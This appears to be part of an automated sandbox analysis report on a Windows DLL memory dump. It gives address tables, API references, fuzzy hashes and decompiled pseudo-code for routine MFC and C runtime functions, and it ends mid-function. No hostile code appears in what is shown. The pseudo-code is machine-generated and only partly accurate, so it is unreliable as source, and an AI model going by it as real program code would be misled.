0x10021983
0x1002199a
0x00000000
0x1002198a
0x1002198c
0x100219a6
0x100219ab
0x100219ae
0x100219b1
0x100219da
0x100219e1
0x100219e3
0x10021a64
0x10021a7f
0x10021a81
0x100219c1
0x100219c1
0x100219c4
0x100219c6
0x100219c9
0x100219c9
0x100219c9
0x100219c9
0x00000000
0x100219cf
0x10021a43
0x10021a43
0x10021a48
0x10021a4e
0x10021a51
0x10021a53
0x10021a56
0x10021a56
0x10021a56
0x10021a56
0x00000000
0x10021a5a
0x100219e5
0x100219e8
0x100219ee
0x100219f1
0x10021a18
0x10021a1b
0x10021a21
0x00000000
0x00000000
0x10021a23
0x10021a26
0x00000000
0x00000000
0x10021a28
0x10021a28
0x10021a2e
0x10021a31
0x1002199f
0x1002199f
0x10021a3a
0x00000000
0x10021a3a
0x100219f3
0x100219f6
0x00000000
0x00000000
0x100219fa
0x10021a0b
0x10021a11
0x10021a13
0x10021a16
0x00000000
0x00000000
0x00000000
0x10021a16
0x100219b3
0x100219b6
0x100219b8
0x100219be
0x100219be
0x00000000
0x1002198e
0x1002198e
0x10021993
0x10021997
0x10021997
0x00000000
0x10021993
0x1002198c

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100219A6
__isleadbyte_l.LIBCMT ref: 100219DA
MultiByteToWideChar.KERNEL32(00000080,00000009,10012B87,?,00000000,00000000,?,?,?,?,10012B87), ref: 10021A0B
MultiByteToWideChar.KERNEL32(00000080,00000009,10012B87,00000001,00000000,00000000,?,?,?,?,10012B87), ref: 10021A79

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 60d2fa0adf6fc0d7ae225ac5cf3cb7bd1432f5b4a95f9bb95a5f6e0bae0b7f28
Instruction ID: 602668ada2edbc3e323a75c1305e42b104193430b5f969aea42227715b4386e1
Opcode Fuzzy Hash: 60d2fa0adf6fc0d7ae225ac5cf3cb7bd1432f5b4a95f9bb95a5f6e0bae0b7f28
Instruction Fuzzy Hash: 4B31DE39A0129AEFDB10CF64EC90AEE3BE5FF11250F9185A9E4A49B191D330DD80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000F9E9, Relevance: 6.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000F9E9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E10006E1F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E10006DEC(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001076F(0x100569f0);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E100166D7(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10013504(_t51, _t66, _t70, _t83);
								}
								_t37 = E10013020(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E10013020(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E100166D7(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000ED20();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E1000F916(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E1000F916(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E1000F916(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E1000F916(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E1000F916(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x1000f9e9
0x1000f9e9
0x1000f9f5
0x1000f9f7
0x1000f9fe
0x1000fad6
0x1000fae1
0x1000fae1
0x1000fa04
0x1000fa05
0x1000fa0a
0x00000000
0x00000000
0x1000fa13
0x1000fa57
0x1000fa57
0x1000fa5d
0x1000fa6a
0x1000fa6e
0x1000fad5
0x00000000
0x1000fa74
0x1000fa74
0x1000fa77
0x1000fa79
0x1000fa8a
0x1000fa91
0x1000fa93
0x1000fa96
0x1000fa9a
0x1000fa9c
0x1000fa9e
0x1000fa9f
0x1000faa4
0x1000faa7
0x1000faaa
0x1000fab0
0x1000fab7
0x1000fabd
0x1000fac2
0x1000fad2
0x1000fad2
0x1000fac2
0x00000000
0x1000fa91
0x1000fa7b
0x1000fa88
0x00000000
0x00000000
0x00000000
0x1000fa88
0x1000fa6e
0x1000fa19
0x1000fa1b
0x1000fa22
0x1000fa24
0x1000fa27
0x1000fa29
0x1000fa2d
0x1000fa2d
0x1000fa29
0x1000fa22
0x1000fa32
0x1000fa3a
0x1000fa42
0x1000fa4a
0x1000fa52
0x00000000

APIs

__msize.LIBCMT ref: 1000FA7C
__msize.LIBCMT ref: 1000FA9F
_malloc.LIBCMT ref: 1000FAB7
_malloc.LIBCMT ref: 1000FACC

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: ab8e2942ddfc65bc0082a799dec448b60aecd78972287d6428759e808dcec10a
Instruction ID: 08ed92be3bda4d3e013ab9471cd449559c2d1998cd0037008d3b7f023d61e778
Opcode Fuzzy Hash: ab8e2942ddfc65bc0082a799dec448b60aecd78972287d6428759e808dcec10a
Instruction Fuzzy Hash: 5B21BF75B006119FEB55DF24D881A7A77E5EF057E0B11842DE85D8BA4EDB30EC80DB81

Uniqueness

Uniqueness Score: -1.00%

Function 10006E8E, Relevance: 6.1, APIs: 4, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10006E8E(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10013978(E100257B1, __ebx, __edi, __esi);
				_t35 = E10003B46(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10006E76(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10015E7B( &_a4, 0x1002d6f4);
				asm("int3");
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10005778(0, _t36, _t37, _t38, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x10006e8e
0x10006e8e
0x10006e8e
0x10006e8e
0x10006e8e
0x10006e95
0x10006ea2
0x10006ea4
0x10006ea7
0x10006ea9
0x10006eae
0x10006eb0
0x10006eb0
0x10006eb5
0x10006eb8
0x10006ebc
0x10006ebf
0x10006ecb
0x10006ed0
0x10006ed6
0x10006ed9
0x10006ede
0x10006ee0
0x10006ee0
0x10006efe
0x10006f14
0x10006f1f
0x10006f27
0x10006f27
0x10006f00
0x10006f03
0x10006f05
0x10006f05
0x10006f2a

APIs

__EH_prolog3.LIBCMT ref: 10006E95

Part of subcall function 10003B46: _malloc.LIBCMT ref: 10003B64

__CxxThrowException@8.LIBCMT ref: 10006ECB
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,10001018,00000000,00000000,00000000,?,?,1002D6F4,00000004,10001018,8007000E,10005250), ref: 10006EF6

Part of subcall function 10005778: __cftof.LIBCMT ref: 10005789

LocalFree.KERNEL32(10001018,10001018,8007000E,10005250), ref: 10006F1F

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: f4da240b0982b4da32c82392cd3e7fbbf4b0f836d433c643d18b72f30616b7e6
Instruction ID: 5988b40b434e7835e39501a58e7d0c45e010a4646fc6ed6acae16bd5472cfff8
Opcode Fuzzy Hash: f4da240b0982b4da32c82392cd3e7fbbf4b0f836d433c643d18b72f30616b7e6
Instruction Fuzzy Hash: 7C117375504249EFEB04DFA4DC85DAE3BA9FF08390F208529FA29CA191E771DA50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000E4EA, Relevance: 6.1, APIs: 4, Instructions: 57
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E1000E4EA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __ecx;
				_t45 = __ebx;
				_push(4);
				E10013978(E10025A94, __ebx, __edi, __esi);
				_t52 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E1000F0BA(__ebx, __ecx, __edi, __ecx, _t54);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				 *_t52 = 0x10028f84;
				_t55 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					 *((intOrPtr*)(_t52 + 0x50)) = 0;
				} else {
					_t44 = E10016682( *((intOrPtr*)(_t53 + 8)));
					_pop(_t47);
					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
				}
				_t46 = E10006DEC(_t45, 0, _t52, _t55);
				_t56 = _t46;
				if(_t46 == 0) {
					L4:
					E1000572D(_t46, _t47, 0, _t52, _t56);
				}
				_t7 = _t46 + 0x74; // 0x74
				_t47 = _t7;
				_t37 = E100068DC(_t46, _t7, 0, _t52, _t56);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t46 + 4)) = _t52;
				 *((short*)(_t52 + 0x92)) = 0;
				 *((short*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x44)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x64)) = 0;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x54)) = 0;
				 *((intOrPtr*)(_t52 + 0x60)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0x58)) = 0;
				 *((intOrPtr*)(_t52 + 0x48)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0x74)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
				return E10013A50(_t52);
			}

0x1000e4ea
0x1000e4ea
0x1000e4ea
0x1000e4ea
0x1000e4f1
0x1000e4f6
0x1000e4f8
0x1000e4fb
0x1000e502
0x1000e505
0x1000e50b
0x1000e50e
0x1000e51e
0x1000e510
0x1000e513
0x1000e518
0x1000e519
0x1000e519
0x1000e526
0x1000e528
0x1000e52a
0x1000e52c
0x1000e52c
0x1000e52c
0x1000e531
0x1000e531
0x1000e534
0x1000e53b
0x00000000
0x00000000
0x1000e53d
0x1000e546
0x1000e54f
0x1000e552
0x1000e557
0x1000e55e
0x1000e565
0x1000e568
0x1000e56b
0x1000e56e
0x1000e571
0x1000e574
0x1000e577
0x1000e57d
0x1000e580
0x1000e583
0x1000e589
0x1000e58f
0x1000e595
0x1000e598
0x1000e59b
0x1000e5a1
0x1000e5a7
0x1000e5aa
0x1000e5ad
0x1000e5be

APIs

__EH_prolog3.LIBCMT ref: 1000E4F1

Part of subcall function 1000F0BA: __EH_prolog3.LIBCMT ref: 1000F0C1

__strdup.LIBCMT ref: 1000E513
GetCurrentThread.KERNEL32 ref: 1000E540
GetCurrentThreadId.KERNEL32 ref: 1000E549

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 0ae0c0a2cd64d537f17908d65a8e4ff30e2d6b8d6c1566a3b440807ce891a09c
Instruction ID: 6727ad0a154305582215af5875457358608423e8027066246117e732c4e71c70
Opcode Fuzzy Hash: 0ae0c0a2cd64d537f17908d65a8e4ff30e2d6b8d6c1566a3b440807ce891a09c
Instruction Fuzzy Hash: 21219DB4801B508FD321DF7A894124AFBE8FFA4744F10890FD5AAC7626DBB1A541CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1000B1CD, Relevance: 6.1, APIs: 4, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000B1CD(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;

				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x188))();
				}
				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
				E10009E88(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E1000A8BD(_t19, _t19, 0);
				_t26 = _t20;
				if(_t20 == 0) {
					E1000572D(_t20, _t22, 0, SendMessageA, _t26);
				}
				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
				E10009E88(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}

0x1000b1cd
0x1000b1d1
0x1000b1de
0x1000b1e2
0x1000b1e4
0x1000b1e4
0x1000b1f9
0x1000b206
0x1000b20b
0x1000b212
0x1000b214
0x1000b216
0x1000b218
0x1000b218
0x1000b224
0x1000b231
0x1000b236
0x1000b23e
0x00000000
0x1000b245
0x1000b24a

APIs

SendMessageA.USER32 ref: 1000B1F9
SendMessageA.USER32 ref: 1000B224
GetCapture.USER32 ref: 1000B236
SendMessageA.USER32 ref: 1000B245

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 0edf88002452f84db39f5a73a7dd9d6e6290f980eb6d415f732a971093e6d787
Instruction ID: 979e6b2f1dd1cc31d3b7c7396af88e39dca887fb9bc6a0360d1e32063c28b29c
Opcode Fuzzy Hash: 0edf88002452f84db39f5a73a7dd9d6e6290f980eb6d415f732a971093e6d787
Instruction Fuzzy Hash: BE01443135025477EB315B668CCDFDB3E7AEBCEB90F110178F6099A1ABCAA19C41D620

Uniqueness

Uniqueness Score: -1.00%

Function 100116BC, Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100116BC(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10031c30; // 0x1f496801
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
				} else {
					_t30 = E10011674(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100127FF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x100116bc
0x100116c4
0x100116cb
0x100116cf
0x100116d3
0x100116da
0x100116dd
0x1001171d
0x1001172e
0x100116df
0x100116e5
0x100116e9
0x100116f7
0x100116fe
0x10011700
0x1001170a
0x1001170a
0x100116e9
0x10011742

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 100116F7
RegCloseKey.ADVAPI32(00000000), ref: 10011700
swprintf.LIBCMT ref: 1001171D
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001172E

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: ed0cf392b8f784ea1d6dce7929b69cb8335649ae06ddcb0df13c96d591960a64
Instruction ID: 13d1d99920ba3d8f7e6a72f95b2f00cbf3a85435afb07d85885adad9d82965b9
Opcode Fuzzy Hash: ed0cf392b8f784ea1d6dce7929b69cb8335649ae06ddcb0df13c96d591960a64
Instruction Fuzzy Hash: 9D01A976501219ABDB00DF688C89FEF73BCFF48754F10041AFA01AB291DB74E91587A5

Uniqueness

Uniqueness Score: -1.00%

Function 10009E88, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10009E88(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000956A(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E10009B9D(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E10009E88(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x10009e88
0x10009e88
0x10009e92
0x10009e98
0x10009efb
0x10009efb
0x10009eff
0x00000000
0x00000000
0x10009e9c
0x10009ea0
0x10009eca
0x10009ea2
0x10009ea3
0x10009ea8
0x10009eaa
0x10009eac
0x10009eaf
0x10009eb2
0x10009eb5
0x10009eb8
0x10009eb9
0x10009eb9
0x10009eaa
0x10009ed0
0x10009ed4
0x10009ed7
0x10009ed9
0x10009edb
0x10009eed
0x10009eed
0x10009edb
0x10009ef5
0x10009ef5
0x10009f04

APIs

GetTopWindow.USER32(00000000), ref: 10009E98
GetTopWindow.USER32(00000000), ref: 10009ED7
GetWindow.USER32(00000000,00000002), ref: 10009EF5

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 380254d2f7aca18c2b5fca0cd152472b46a4d29870b429f90d0332a3b1765878
Instruction ID: 398b7dc9b2b775c86cadc4269cf5b94dd9ea6a466b344ed10e987cb4a8764082
Opcode Fuzzy Hash: 380254d2f7aca18c2b5fca0cd152472b46a4d29870b429f90d0332a3b1765878
Instruction Fuzzy Hash: F501C53600166AABEF12DF91CC05EDF3B6AEF453A1F158011FE1451064C736D962EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F468, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F468(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1001ED59(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1001EE49(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1001F36E(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1001F2B3(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x1001f46d
0x1001f473
0x1001f4e6
0x00000000
0x1001f47a
0x1001f47a
0x1001f47d
0x1001f498
0x1001f49b
0x1001f4bb
0x1001f4cd
0x1001f49d
0x1001f49d
0x1001f4a0
0x00000000
0x1001f4a2
0x1001f4b4
0x1001f4b4
0x1001f4a0
0x1001f4eb
0x1001f4ef
0x1001f47f
0x1001f497
0x1001f497
0x1001f47d

APIs

__cftof_l.LIBCMT ref: 1001F48E

Part of subcall function 1001F2B3: __fltout2.LIBCMT ref: 1001F2DF

__cftog_l.LIBCMT ref: 1001F4B4
__cftoe_l.LIBCMT ref: 1001F4E6

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: fd5222fe97b11293dfb5a2398c112822d17547e39afae7384f5c390b2fbf9a53
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 03114C3640018EBBCF129E94CC51CEE3F62FB28294B598419FE2859031D236DAB1AB91

Uniqueness

Uniqueness Score: -1.00%

Function 10009844, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10009844(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
